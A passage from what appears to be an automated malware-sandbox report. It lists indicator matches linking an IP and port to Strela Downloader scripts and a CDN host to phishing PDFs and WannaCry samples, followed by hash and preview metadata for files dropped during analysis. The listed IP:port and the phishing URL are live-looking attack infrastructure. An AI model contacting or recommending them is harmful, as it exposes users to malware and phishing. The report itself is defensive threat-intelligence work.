193.143.1.205 | 17201670993971103.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 2330118683179179335.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 577119676170175151.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 106714464113327088.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 3062912729105825642.js | malicious | Strela Downloader | 193.143.1.205:8888/
193.143.1.205 | 1684156262492114486.js | malicious | Strela Downloader | 193.143.1.205:8888/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | Invdoc80.pdf | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | Reversed order 24-25.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | wmnq39xe8J.dll | malicious | Wannacry | 199.232.214.172
bg.microsoft.map.fastly.net | Final-Agreement-Document#808977735.pdf | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | tTbeoLWNhb.dll | malicious | Wannacry | 199.232.214.172
bg.microsoft.map.fastly.net | Document-01-16-25.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Eastern Contractors Corporation Contract and submittal document.eml | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | v9xYj92wR3.dll | malicious | Wannacry | 199.232.214.172
bg.microsoft.map.fastly.net | https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9d | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | FjSrGs0AE2.dll | malicious | Wannacry | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BITWEB-ASRU | 14957144702878221204.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 1579614525244583223.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 35491083472324549.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 28236151432955330765.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 17201670993971103.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 2330118683179179335.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 577119676170175151.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 106714464113327088.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 3062912729105825642.js | malicious | Strela Downloader | 193.143.1.205
BITWEB-ASRU | 1684156262492114486.js | malicious | Strela Downloader | 193.143.1.205
                      No context
                      No context
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.8307018394689994
                      Encrypted:false
                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugN:gJjJGtpTq2yv1AuNZRY3diu8iBVqFn
                      MD5:48F402C87C76E8C4FF5197F35DBFF658
                      SHA1:5BF54F057A03ACBBFBCC8BA789363E31D1D32E6E
                      SHA-256:32185C29973E619E3AD14D22562EFAD480CF4B9C6DA6B6A22160EB267CB1843A
                      SHA-512:2D08B239785E323E099A42CAE387B1D4EB00E96182E29750D13A60406DD1DAD11301AB4EEA35F5BF404F78C17F5654AD714A486C10827235C840131DAB7432C7
                      Malicious:false
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe5ed128d, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.6585494581666045
                      Encrypted:false
                      SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                      MD5:C757F4CEF13C747780B101AEB6DB6A64
                      SHA1:B340B82350035A0CF210CD51AEF5314CE3CEE77A
                      SHA-256:7BE22C3C26A5A4CE3560FD8021FCA7A795D5C8902DC85BCD7984F8A6F8E68587
                      SHA-512:2FED22EE33A487ADA6034D7578907A91567E1DEDCA0EE1E3FBA46A07ED793BB7B58B13E46F203351A239C5D52EAF61669078FED6E2BE7B665A66F4A7454F4963
                      Malicious:false
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.07925197019192107
                      Encrypted:false
                      SSDEEP:3:VYeYRqyekGuAJkhvekl1tZ/tAllrekGltll/SPj:Vz/ytrxlfLAJe3l
                      MD5:6E2EFBD0A5CD17B3B6A1B3869D226AE8
                      SHA1:99A7299068AF5A60D2FB48B9A8A03AEC25A669B4
                      SHA-256:3BAE96B8EB427740248090B653394377293E62A52F3993962BB0789E0F9885D6
                      SHA-512:BA0EA02EC130552631E004BE0F06B78648CC8EFD3D4735A06FAA0306CB64F71C8FC337FBEA4732BDA4406CE051083630E65AA73EFEF95227148BEE4599150DEE
                      Malicious:false
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.188180365425627
                      Encrypted:false
                      SSDEEP:6:iOuvTusM+q2P92nKuAl9OmbnIFUt4vfJdmZmwivfJdpMVkwO92nKuAl9OmbjLJ:76M+v4HAahFUt2A/sjMV5LHAaSJ
                      MD5:731B4402A57D3D9E1C04D8BF9D66FF96
                      SHA1:EE8158C75B1B219303FE02D417D96EE718954623
                      SHA-256:DEC88ABFF9B1A65798898DFF9CC378EDDB9CCB560B65FABE0F4B0B144416C214
                      SHA-512:5CDE9C94AB04643E1035DBC8127287873539B0ECD09E5CD12DB5520DA866F6F45AD28360726249C738427073CE9E9B661F0DEFDCBAD1E9FD5E4ED95E0318EFA2
                      Malicious:false
                      Preview:2025/01/15-02:13:09.865 1c8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-02:13:09.869 1c8c Recovering log #3.2025/01/15-02:13:09.869 1c8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):338
                      Entropy (8bit):5.082723225167753
                      Encrypted:false
                      SSDEEP:6:iOuvY44q2P92nKuAl9Ombzo2jMGIFUt4vjNJZmwiviDkwO92nKuAl9Ombzo2jMmd:7Dv4HAa8uFUtI/v5LHAa8RJ
                      MD5:9BBF72910066DA5698F77B8C88571096
                      SHA1:1CA8926EEEBF9A89CEB7AF0444DEF0F8BA1C2D10
                      SHA-256:3B4DC80FF01454AF4A35B6E379BCE2DE82C8E7C6FA115419FC61D86C55357C9D
                      SHA-512:CE8809964B662E8C05B89C31265E04F7880C0B1FDFF5DECE805F9B63861C09D5CC25283E0E8D966A0BF52CE15DA695265113A0D83B009CC9E2EAC4156D04CD30
                      Malicious:false
                      Preview:2025/01/15-02:13:10.019 1d04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-02:13:10.020 1d04 Recovering log #3.2025/01/15-02:13:10.021 1d04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):508
                      Entropy (8bit):5.0534180424655215
                      Encrypted:false
                      SSDEEP:12:YH/um3RA8sqYsBdOg2H7fcaq3QYiubxnP7E4T3OF+:Y2sRds0dMHC3QYhbxP7nbI+
                      MD5:8CFFF7705576FCB082D0DB5706FB8ECE
                      SHA1:1E3125EE0F0AB3483FB2A54AC6CCF8EECF1C43D3
                      SHA-256:B5687641F82158916D5AFBFC73D66DE554343355D9F0FA5FC62A149EFBC50779
                      SHA-512:94189130AF7905F1AA85D009A1EC90BAF83F4B5E8825EFA47199E5F8552BDF1FCFBB655EC2A9E63F280BD74F7E81E3C2A194BF1FA87A5FDD6FC6FF79FF8663C9
                      Malicious:false
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381485202513769","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":121614},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:modified
                      Size (bytes):508
                      Entropy (8bit):5.0534180424655215
                      Encrypted:false
                      SSDEEP:12:YH/um3RA8sqYsBdOg2H7fcaq3QYiubxnP7E4T3OF+:Y2sRds0dMHC3QYhbxP7nbI+
                      MD5:8CFFF7705576FCB082D0DB5706FB8ECE
                      SHA1:1E3125EE0F0AB3483FB2A54AC6CCF8EECF1C43D3
                      SHA-256:B5687641F82158916D5AFBFC73D66DE554343355D9F0FA5FC62A149EFBC50779
                      SHA-512:94189130AF7905F1AA85D009A1EC90BAF83F4B5E8825EFA47199E5F8552BDF1FCFBB655EC2A9E63F280BD74F7E81E3C2A194BF1FA87A5FDD6FC6FF79FF8663C9
                      Malicious:false
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381485202513769","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":121614},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4099
                      Entropy (8bit):5.240310449653802
                      Encrypted:false
                      SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUlRBtytvW1n8:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLT
                      MD5:6304C5334FE1DFCA34EDDC6ED8EC887B
                      SHA1:222F8F99D06936C8FC6B60C4A2436B2609427CC9
                      SHA-256:3458312264C4F22E87183A40FE112DF45444984CC31DE1851461729A95022A90
                      SHA-512:BF69D3B75F6A8AFA6D763E4F95AA8E1686EEE32081985538CCFB85322F162F195EF3CE476BE47AC7B8B769B071F25DF99E1A0C18B77B76B79DBDA994E1C166AC
                      Malicious:false
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):326
                      Entropy (8bit):5.09374000170039
                      Encrypted:false
                      SSDEEP:6:iOuvPc4q2P92nKuAl9OmbzNMxIFUt4vPlLJZmwivPkLDkwO92nKuAl9OmbzNMFLJ:78Lv4HAa8jFUt+b/wU5LHAa84J
                      MD5:314FD833C868395BBA98FD5E1F4406B2
                      SHA1:F9AE245383C03C22BE9E7CFCADB049A643F56733
                      SHA-256:DAE08B68CBF5F67C1B39232DA0C140D1EAA60016095B1BE556977B45ECE6E144
                      SHA-512:B624F3D46A63901A5232A87BE97B9245DADB7E064F627A92A8C79AB6910B973EB11A7E461CED211EFA0C68D728A67411D0127C81BB229F95EF07373DF8C88146
                      Malicious:false
                      Preview:2025/01/15-02:13:10.131 1d04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-02:13:10.132 1d04 Recovering log #3.2025/01/15-02:13:10.133 1d04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:Certificate, Version=3
                      Category:dropped
                      Size (bytes):1391
                      Entropy (8bit):7.705940075877404
                      Encrypted:false
                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                      Malicious:false
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                      Category:dropped
                      Size (bytes):71954
                      Entropy (8bit):7.996617769952133
                      Encrypted:true
                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                      Malicious:false
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):192
                      Entropy (8bit):2.736068239839641
                      Encrypted:false
                      SSDEEP:3:kkFklnfyTPMlXfllXlE/HT8klA/tNNX8RolJuRdxLlGB9lQRYwpDdt:kK3T02T8s4NMa8RdWBwRd
                      MD5:26CDAE5FA7291DE2B9501455BCEA814D
                      SHA1:812768659D8124AABD9E3B5F2657BEA367AF49FA
                      SHA-256:B7E2577ABE45FA3A19ED24420E5E8B2D56159A5D44C9FF90E7DDCD3D6E02580A
                      SHA-512:D5EC28C2CB710321694C3D652E87CCDD74F0B91C92BBA2B2600B93876917D862F6BF8B90B9836244CB42DC0644F1FAE385F59D6D4DA83AEA8F1D04E1947B3470
                      Malicious:false
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:modified
                      Size (bytes):328
                      Entropy (8bit):3.247897867253901
                      Encrypted:false
                      SSDEEP:6:kKfGi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XGdDImsLNkPlE99SNxAhUe/3
                      MD5:17613CDB8D121EBCFB75CA735B9DC57A
                      SHA1:E1349FDC9CC35085D09648C5D7D10647C850EF88
                      SHA-256:CC5424B5A11B3148B80D04B4A3A0C62B579D8CAC206E9D6550C7960BAE76AD13
                      SHA-512:D411282FDD4D4E2FA6F61D3C0C2B86CAD5C221F324D6369868FBD27D5F52691DF66F1C1201BCCACA50416CA4E9A172E90EE719A425D1F69398F842692B65C37D
                      Malicious:false
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):10880
                      Entropy (8bit):5.214360287289079
                      Encrypted:false
                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.309610314063338
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJM3g98kUwPeUkwRe9:YvXKXDDI+KW5YpW76VeGMbLUkee9
                      MD5:53DDF6A374AFBD4B3D282AD86B0E37B3
                      SHA1:870469E86CD83D53FCFF8F5E476B1837ED4D906E
                      SHA-256:728A7E7B6755610D4BD8F3CB57907AC98388F96338A2670B1AAAAEACEB883480
                      SHA-512:6BA2693E04931596A1B149ED6F9B72558B0D46BB2FC7ADD2C9852D75584AE5668E0E0E615CA371057750D362DA4940C29ACE7F7E2095904AFDC120965FC5112F
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.249555671606703
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfBoTfXpnrPeUkwRe9:YvXKXDDI+KW5YpW76VeGWTfXcUkee9
                      MD5:8C53FE437B7CD93BEB7EA20504439E70
                      SHA1:234ED94ABC90945B56562E45CA32A058C664CDE3
                      SHA-256:64B6B6D444659D32134D4AC0EA610693EBC770ED66DF44209D637F0431DF796D
                      SHA-512:7EF06B99C47EDEE8E20A14527E6B8C484989CE2E52FF6B4C6386B5BE5FCFAE8063AC26212C9ED880D74402EB796965DD643ABF28CDEBA9437576E59C2CBC000A
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.228550707001778
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfBD2G6UpnrPeUkwRe9:YvXKXDDI+KW5YpW76VeGR22cUkee9
                      MD5:6BFE26C6F051EC07DB60513796777117
                      SHA1:B105E760C1C39D42C1753E7E84C5BF741743545A
                      SHA-256:AC3B1E31ABB5906630A726373D25C1150094DDD991C0E5584EA0240150809BC9
                      SHA-512:5990189343C787089A2026D13DCA2EF499A8528B84820EB12DF95B97E357DF941B82B2D59FF546F9344CE714A401492749C581ACE7692AB1EF043CDDB3DF852C
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):285
                      Entropy (8bit):5.286617119006612
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfPmwrPeUkwRe9:YvXKXDDI+KW5YpW76VeGH56Ukee9
                      MD5:B7C9DA40B57B2A96CB98A72E0E2783E3
                      SHA1:120C18B242123552F7E6FB29F9F2E5E98A78E434
                      SHA-256:A39D5B26E6F2D9FD44FF152695E6BF1C7DF7D77E7820382272D878BD472CE620
                      SHA-512:E99AF2B8256D8FACFDD3C230F89D10EE8E8DCE61C0403844E001D35F8F0D682D910CA938650E835DE1F7CF745B467FE5307DB12D041D3411A9991634022AD445
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1123
                      Entropy (8bit):5.683320566856438
                      Encrypted:false
                      SSDEEP:24:Yv6XDDGligpLgE9cQx8LennAvzBvkn0RCmK8czOCCSU:YvOGMghgy6SAFv5Ah8cv/U
                      MD5:4F597AD4559926B0A1A8958A76C5A153
                      SHA1:58C5C244C351C2DC9119F866A3FE22C51F20FF0D
                      SHA-256:4F91AB29B743C916D6A2D166486E41041459C60FD8365536439FB4B325C83D28
                      SHA-512:164412A95FC3B2BD24AE19F8B008B681B179C1D448856F7B775F5719FC891DA181995DC41679B02653A49993489E5B4046ED24F10E00A1EA1CE459E180001FE5
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.232529532691426
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJf8dPeUkwRe9:YvXKXDDI+KW5YpW76VeGU8Ukee9
                      MD5:DC4CAAE49CD1A6465BC1CCBF312F8E86
                      SHA1:B3B5A5E2962DEC4A0A2B2803D7A305143BFCC03F
                      SHA-256:AEDF48A94742DE6D107327BBFEA37172135C372EB910408556D12875D5480792
                      SHA-512:DBC8D8637393376D29C6470FAA1378D0EFDDE60B3B8BF282489CC410B48AEE9F82B51447123CC9CEDB7BD491BF49F5ED9B815362DAD4FCC0A1EFC60B48A03D90
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):5.234486921237345
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfQ1rPeUkwRe9:YvXKXDDI+KW5YpW76VeGY16Ukee9
                      MD5:9EDB6F7DDE1805EE2762B8EFE5BEB3B8
                      SHA1:5A7496B9267559EA8DF0511977BA1F890737606F
                      SHA-256:5736B2CCC705DC20DC9B501705E69D398482C20C82F482FC4916BF59A03464E4
                      SHA-512:10E8CFA2BD230BA41F00F5AA9CDC2370AEB3D6BC46E47A3B51145D3057EFD3BEFEB91AD272AB0F8F9A9C8BE376CD1D76E06400FC929B5E1B3760C44F78241FD5
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.253551723835039
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfFldPeUkwRe9:YvXKXDDI+KW5YpW76VeGz8Ukee9
                      MD5:0D17A954F909287757BD6A400CA9C1CF
                      SHA1:C394E0F152B25FBB6B765C2656422C607BA7ACF8
                      SHA-256:C6E4FAC2C1AB41841BE4EA8C855D78E345915E7A5398E6BF01C52C86D3D66667
